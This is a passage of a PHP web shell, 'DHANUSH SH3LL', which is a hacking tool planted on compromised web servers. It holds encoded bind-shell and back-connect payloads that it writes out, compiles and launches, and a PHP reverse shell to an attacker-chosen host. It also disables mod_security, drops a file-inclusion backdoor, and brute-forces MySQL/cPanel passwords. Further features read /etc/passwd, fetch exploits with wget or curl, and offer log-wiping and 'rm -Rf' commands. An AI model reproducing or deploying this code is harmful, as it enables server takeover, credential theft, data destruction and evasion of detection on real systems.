7249 document.getElementById('fid').style.display='none';
7250 document.getElementById('joomla').style.display='none';
7251 }
7252 if(msg == 'joomla')
7253 {
7254 document.getElementById('joomla').style.display='block';
7255 document.getElementById('tableprefix').value="jos_";
7256 document.getElementById('wpress').style.display='none';
7257 document.getElementById('fid').style.display='none';
7258 }
7259}
7260function checkforum(msg)
7261{
7262 if(msg == 'smf')
7263 {
7264 document.getElementById('tableprefix').value="smf_";
7265 document.getElementById('smfipb').style.display='block';
7266 document.getElementById('myjoomla').style.display='none';
7267
7268 }
7269 if(msg == 'phpbb')
7270 {
7271 document.getElementById('tableprefix').value="phpb_";
7272 document.getElementById('myjoomla').style.display='none';
7273 document.getElementById('smfipb').style.display='block';
7274
7275 }
7276 if(msg == 'mybb')
7277 {
7278 document.getElementById('tableprefix').value="mybb_";
7279 document.getElementById('myjoomla').style.display='none';
7280 document.getElementById('smfipb').style.display='none';
7281 }
7282 if(msg == 'vb')
7283 {
7284 document.getElementById('tableprefix').value="";
7285 document.getElementById('myjoomla').style.display='none';
7286 document.getElementById('smfipb').style.display='none';
7287 }
7288 if(msg == 'ipb')
7289 {
7290 document.getElementById('myjoomla').style.display='none';
7291 document.getElementById('smfipb').style.display='block';
7292 document.getElementById('tableprefix').value="";
7293 }
7294 if(msg == 'wp')
7295 {
7296 document.getElementById('tableprefix').value="wp_";
7297 document.getElementById('myjoomla').style.display='block';
7298 document.getElementById('smfipb').style.display='none';
7299 document.getElementById('siteurl').value="http://site/blog";
7300 }
7301 if(msg == 'joomla')
7302 {
7303 document.getElementById('myjoomla').style.display='block';
7304 document.getElementById('tableprefix').value="jos_";
7305 document.getElementById('smfipb').style.display='none';
7306 document.getElementById('siteurl').value="http://site/administrator/";
7307 }
7308}
7309</script>
7310<body>
7311<?php
7312
7313$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
7314
7315$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
7316
7317$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
7318
7319$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
7320
7321echo $shellstyle;
7322?>
7323<table style="width:100%;">
7324<tr align="right">
7325<td><a href="<?php echo $self;?>"><font size="6" style="text-decoration:none;" face="Times New Roman, Times, serif">DHANUSH SH3LL </font></a>
7326</td><td align="right">
7327<form method="get">
7328<select id="style" class="sbox" onChange="change_style(this.value)">
7329<option selected="selected">--Style--</option>
7330<option value="dhanush">Dhanush</option>
7331<option value="404">404</option>
7332<option value="phizo">Phizo</option>
7333<option value="orange">Orange</option>
7334</select>
7335</form></td>
7336</tr></table>
7337<hr color="#1B1B1B">
7338
7339<table cellpadding="0" style="width:100%;">
7340 <tr>
7341 <td colspan="2" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
7342 <td style="width:7%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
7343 <td style="width:8%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
7344 </tr>
7345 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
7346 <td style="width:85%;" colspan="2">Uid : <font class="txt"><?php if(shell_exec("id")){echo shell_exec("id");}else{echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid();} ?></font></td>
7347 <?php $d0mains = @file("/etc/named.conf");
7348 $users=@file('/etc/passwd');
7349 if($d0mains)
7350 {
7351 $count;
7352 foreach($d0mains as $d0main)
7353 {
7354 if(@ereg("zone",$d0main))
7355 {
7356 preg_match_all('#zone "(.*)"#', $d0main, $domains);
7357 flush();
7358 if(strlen(trim($domains[1][0])) > 2)
7359 {
7360 flush();
7361 $count++;
7362 }
7363 }
7364 }
7365 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
7366 }
7367 else if($users)
7368 {
7369 $file = fopen("/etc/passwd", "r");
7370 while(!feof($file))
7371 {
7372 $s = fgets($file);
7373 $matches = array();
7374 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
7375 $matches = str_replace("home/","",$matches[1]);
7376 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
7377 continue;
7378 $count++;
7379 }
7380 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
7381 <?php if($os == "Linux") { ?><td style="width:8%;vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>">Download It</a></td><?php } ?>
7382 </tr><?php } ?>
7383 <tr>
7384 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); ?> of <?php echo HumanReadableFilesize(diskSpace()); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
7385 <td style="width:20%;vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
7386
7387 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
7388 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
7389 </tr>
7390
7391 <tr>
7392 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
7393 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900">
7394 <?php
7395 $d = str_replace("\\",$directorysperator,$dir);
7396 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
7397 $d = str_replace("\\\\","\\",$d);
7398 $dispd = htmlspecialchars($d);
7399 $pd = $e = explode($directorysperator,substr($d,0,-1));
7400 $i = 0;
7401 foreach($pd as $b)
7402 {
7403 $t = '';
7404 $j = 0;
7405 foreach ($e as $r)
7406 {
7407 $t.= $r.$directorysperator;
7408 if ($j == $i) {break;}
7409 $j++;
7410 }
7411$href=addslashes($t);
7412
7413 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
7414 $i++;
7415 }
7416
7417 ?>
7418 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
7419 <td colspan="3" style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
7420 </tr>
7421 </table>
7422
7423<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
7424 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
7425 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
7426 <tr>";
7427 $menu = '';
7428
7429 foreach($m1 as $k => $v)
7430 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7431 echo $menu;
7432 echo "</tr>
7433</table>
7434<center>
7435<table style=\"border-color:#333333;\" border=2 width=70%; cellpadding=2>
7436 <tr align=center>";
7437 foreach($m2 as $k => $v)
7438 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7439 echo $menu1;
7440 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
7441 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
7442 </tr>
7443</table></center>";?>
7444
7445<div id="showmaindata"></div>
7446<center><div id="showmydata"></div></center>
7447<?php
7448
7449if(isset($_GET["downloadit"]))
7450{
7451 $FolderToCompress = getcwd();
7452 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
7453
7454 $prd=explode("/","backup.tar");
7455 for($i=0;$i<sizeof($prd);$i++)
7456 {
7457 $nfd=$prd[$i];
7458 }
7459 @ob_clean();
7460 header("Content-type: application/octet-stream");
7461 header("Content-length: ".filesize($nfd));
7462 header("Content-disposition: attachment; filename=\"".$nfd."\";");
7463 readfile($nfd);
7464 exit;
7465}
7466//Turn Safe Mode Off
7467if(getDisabledFunctions() != "None" || safe() != "OFF")
7468{
7469 $file_pointer = fopen(".htaccess", "w+");
7470 fwrite($file_pointer, "<IfModule mod_security.c>
7471 SecFilterEngine Off
7472 SecFilterScanPOST Off
7473 </IfModule> \n\r");
7474
7475 $file_pointer = fopen("ini.php", "w+");
7476 fwrite($file_pointer, "<?
7477echo ini_get(\"safe_mode\");
7478echo ini_get(\"open_basedir\");
7479include(\$_GET[\"file\"]);
7480ini_restore(\"safe_mode\");
7481ini_restore(\"open_basedir\");
7482echo ini_get(\"safe_mode\");
7483echo ini_get(\"open_basedir\");
7484include(\$_GET[\"ss\"]);
7485?>");
7486
7487 $file_pointer = fopen("php.ini", "w+");
7488 fwrite($file_pointer, "safe_mode = Off");
7489
7490 fclose($file_pointer);
7491
7492 }
7493
7494if(isset($_POST['cpanelattack']))
7495{
7496 if(!empty($_POST['username']) && !empty($_POST['password']))
7497 {
7498 $userlist=explode("\n",$_POST['username']);
7499 $passlist=explode("\n",$_POST['password']);
7500
7501 $e = explode("\n",$_POST['username']);
7502 foreach($e as $value)
7503 {
7504 $k = explode(":",$value);
7505 $username .= $k['0']." ";
7506 }
7507
7508 $a1 = explode(" ",$username);
7509 $a2 = explode("\n",$_POST['password']);
7510 $id2 = count($a2);
7511 $ok = 0;
7512 foreach($a1 as $user)
7513
7514 {
7515 if($user !== '')
7516 {
7517 $user=trim($user);
7518 for($i=0;$i<=$id2;$i++)
7519 {
7520 $pass = trim($a2[$i]);
7521 if(@mysql_connect('localhost',$user,$pass))
7522 {
7523 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
7524 $ok++;
7525 }
7526 }
7527 }
7528 }
7529 echo "<hr><b>You Found <font color=red>$ok</font></b>";
7530 }
7531 else
7532 $bdmessage = "<center>Enter Username & Password List<center>";
7533}
7534elseif(isset($_GET['style']))
7535{
7536 setcookie('style',$_GET['style']);
7537 header("location:$self");
7538}
7539else if(isset($_GET['info']))
7540{
7541 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
7542}
7543else if(isset($_POST['u']))
7544{
7545 $path = $_REQUEST['path'];
7546 if(is_dir($path))
7547 {
7548 $setuploadvalue = 0;
7549 $uploadedFilePath = $_FILES['uploadfile']['name'];
7550 $tempName = $_FILES['uploadfile']['tmp_name'];
7551 if($os == "Windows")
7552 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7553 else if($os == "Linux")
7554 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7555 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
7556 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
7557 else
7558 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
7559 }
7560 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
7561}
7562else if(isset($_POST['backdoor']))
7563{
7564 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
7565 { ?><script type="text/javascript">gethome('connect');</script><?php
7566 $passwd = $_POST['passwd'];
7567
7568 if($_POST['lang'] == 'c')
7569 {
7570 if(is_writable("."))
7571 {
7572 @$fh=fopen(getcwd()."/backp.c",'w');
7573 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7574 @fclose($fh);
7575 execmd("chmod 0755 ".getcwd()."/backp.c");
7576 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
7577 execmd("chmod 0755 ".getcwd()."/backp");
7578 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
7579 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7580 if(eregi("backp".$_POST['port'],$scan))
7581 $bdmessage = "Process found running, backdoor setup successfully.";
7582 else
7583 $bdmessage = "Process not found running, backdoor not setup successfully.";
7584 }
7585 else
7586 {
7587 @$fh=fopen("/tmp/backp.c","w");
7588 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7589 @fclose($fh);
7590 execmd("chmod 0755 /tmp/backp.c");
7591 execmd("gcc -o /tmp/backp /tmp/backp.c");
7592 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
7593 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7594 if(eregi("backp".$_POST['port'],$scan))
7595 $bdmessage = "Process found running, backdoor setup successfully.";
7596 else
7597 $bdmessage = "Process not found running, backdoor not setup successfully.";
7598 }
7599 }
7600 if($_POST['lang'] == 'perl')
7601 {
7602 if(is_writable("."))
7603 {
7604 @$fh=fopen(getcwd()."/bp.pl",'w');
7605 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7606 @fclose($fh);
7607 execmd("chmod 0755 ".getcwd()."/bp.pl");
7608 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7609
7610 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7611 }
7612 else
7613 {
7614 @$fh=fopen("/tmp/bp.pl","w");
7615 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7616 @fclose($fh);
7617 execmd("chmod 0755 ".getcwd()."/bp.pl");
7618 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7619 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7620 }
7621 }
7622 }
7623}
7624else if(isset($_POST['backconnect']))
7625{
7626 if($_POST['ip'] != "" && $_POST['port'] != "")
7627 { ?><script type="text/javascript">gethome('connect');</script><?php
7628 $host = $_POST['ip'];
7629 $port = $_POST['port'];
7630 if($_POST["lang"] == "perl")
7631 {
7632 if(is_writable("."))
7633 {
7634 @$fh=fopen(getcwd()."/bc.pl",'w');
7635 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7636 @fclose($fh);
7637 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7638 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
7639 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
7640 }
7641 else
7642 {
7643 @$fh=fopen("/tmp/bc.pl","w");
7644 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7645 @fclose($fh);
7646 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7647 execmd("perl /tmp/bc.pl $host $port &",$disable);
7648 if(!@unlink("/tmp/bc.pl"))
7649 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7650 }
7651 }
7652 else if($_POST["lang"] == "python")
7653 {
7654 if(is_writable("."))
7655 {
7656 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
7657 if($w_file)
7658 {
7659 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7660 @fclose($w_file);
7661 chmod(getcwd().'/bc.py', 0777);
7662 }
7663 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
7664 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7665
7666 if(!@unlink(getcwd()."/bc.py"))
7667 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7668 }
7669 else
7670 {
7671 $w_file=@fopen("/tmp/bc.py","w");
7672 if($w_file)
7673 {
7674 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7675 @fclose($w_file);
7676 chmod('/tmp/bc.py', 0777);
7677 }
7678 execmd("python /tmp/bc.py $host $port &",$disable);
7679 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7680 if(!@unlink("/tmp/bc.py"))
7681 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
7682 }
7683 }
7684 else if($_POST["lang"] == "php")
7685 {
7686 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7687 $ip = $_POST['ip'];
7688 $port=$_POST['port'];
7689 $sockfd=fsockopen($ip , $port , $errno, $errstr );
7690 if($errno != 0)
7691 {
7692 $bdmessage = "<b>$errno</b> : $errstr";
7693 }
7694 else if (!$sockfd)
7695 {
7696 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
7697 }
7698 else
7699 {
7700 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
7701 $pwd = exec_all("pwd");
7702 $sysinfo = exec_all("uname -a");
7703 $id = exec_all("id");
7704 $len = 1337;
7705 fputs($sockfd ,$sysinfo . "\n" );
7706 fputs($sockfd ,$pwd . "\n" );
7707 fputs($sockfd ,$id ."\n\n" );
7708 fputs($sockfd ,$dateAndTime."\n\n" );
7709 while(!feof($sockfd))
7710 {
7711 $cmdPrompt ="(dhanush)[$]> ";
7712 fputs ($sockfd , $cmdPrompt );
7713 $command= fgets($sockfd, $len);
7714 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
7715 }
7716 fclose($sockfd);
7717 }
7718 }
7719 }
7720}
7721else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
7722{
7723 $temp = "";
7724 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
7725 {
7726 $uid = @posix_getpwuid($_GET['val1']);
7727 if ($uid)
7728 $temp .= join(':',$uid)."\n";
7729 }
7730 echo '<br/>';
7731 paramexe('Users', $temp);
7732}
7733else if(isset($_GET['download']))
7734{
7735 download();
7736}
7737else
7738{
7739 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
7740}
7741$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
7742?>
7743</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
7744<table class="btmtbl" style="width:100%;" border="1">
7745<tr>
7746<td class="btmtbl" align="center">
7747<form method="post" enctype="multipart/form-data">
7748Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
7749<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
7750<input type=submit value="Upload" name="u" value="u" class="but" ></form>
7751<span name="wrtble"><?php
7752
7753echo $is_writable; ?></span>
7754 <br>
7755</td>
7756<td class="btmtbl" align="center" style="height:105px;">Create File :
7757<form onSubmit="createdir('Create',createfile.value);return false;">
7758<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
7759<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
7760</form><span name="wrtble">
7761<?php echo $is_writable; ?></span>
7762</td>
7763</tr>
7764<tr>
7765<td class="btmtbl" align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
7766<input type="text" class="box" name="execute">
7767<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
7768 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
7769
7770<td class="btmtbl" align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
7771<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
7772<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
7773</form><span name="wrtble"><?php
7774echo $is_writable;
7775?></span></td></tr>
7776<tr>
7777<td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
7778<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
7779<input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
7780</form></td>
7781<td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
7782<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
7783<input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
7784</form></td></tr>
7785<tr><td class="btmtbl" style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
7786<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
7787<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
7788<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
7789<select name="functiontype" class="sbox">
7790<option value="wwget">wget</option>
7791<option value="wlynx">lynx</option>
7792<option value="wfread">fread</option>
7793<option value="wfetch">fetch</option>
7794<option value="wlinks">links</option>
7795<option value="wget">GET</option>
7796<option value="wcurl">curl</option>
7797</select>
7798</form><div id="showexp"></div>
7799</td>
7800<td class="btmtbl" align="center">
7801<form>
7802Some Commands<br>
7803<?php if($os != "Windows")
7804{ ?>
7805<SELECT NAME="mycmd" class="box">
7806 <OPTION VALUE="uname -a">Kernel version
7807 <OPTION VALUE="w">Logged in users
7808 <OPTION VALUE="lastlog">Last to connect
7809 <option value='cat /etc/hosts'>IP Addresses
7810 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
7811 <OPTION VALUE="logeraser">Log Eraser
7812 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
7813 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
7814 <OPTION VALUE="find / -type f -name 'config'">find config files
7815 <OPTION VALUE="find . -type f -name \"config\"">find config files in current dir
7816
7817 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
7818 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
7819 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
7820 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
7821 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
7822 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
7823 <OPTION VALUE="ps aux">Show running proccess
7824 <OPTION VALUE="uptime">Uptime check
7825 <OPTION VALUE="cat /proc/meminfo">Memory check
7826 <OPTION VALUE="netstat -an | grep -i listen">Open ports
7827 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
7828 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
7829 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
7830 <OPTION VALUE="./zap2">WIPELOGS PT3
7831 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
7832 </SELECT>
7833 <?php } else {?>
7834 <SELECT NAME="mycmd" class="box">
7835 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
7836 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
7837 <OPTION VALUE="systeminfo">System Informations
7838 <OPTION VALUE="net user">User accounts
7839 <OPTION VALUE="netstat -an">Open ports
7840 <OPTION VALUE="getmac">Get Mac Address
7841 <OPTION VALUE="net start">Show running services
7842 <OPTION VALUE="net view">Show computers
7843 <OPTION VALUE="arp -a">ARP Table
7844 <OPTION VALUE="tasklist">Show Process
7845 <OPTION VALUE="ipconfig/all">IP Configuration
7846
7847 </SELECT>
7848 <?php } ?>
7849 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
7850<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
7851</form>
7852</td>
7853</tr></table><br>
7854
7855</td>
7856</tr>
7857</table>
7858
7859<?php
7860
7861
7862//logout
7863
7864if(isset($_GET['logout']))
7865{
7866 setcookie("hacked",time() - 60*60);
7867 header("Location:$self");
7868 ob_end_flush();
7869}
7870
7871}
7872}
7873
7874if(isset($_POST['uname']) && isset($_POST['passwd']))
7875{
7876 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
7877 {
7878 setcookie("hacked", md5($pass));
7879 $selfenter = $_SERVER["PHP_SELF"];
7880 header("Location:$selfenter");
7881 }
7882}
7883
7884if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
7885{
7886 echo $shellstyle;
7887?>
7888 <center>
7889 <form method="POST">
7890 <div class="logindiv" style="width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px;">
7891 <table cellpadding="9" cellspacing="4">
7892 <tr>
7893 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
7894 </tr>
7895 <tr>
7896 <td align="right"><b>User Name : </b></td>
7897 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7898 </tr>
7899 <tr>
7900 <td align="right"><b>Password : </b></td>
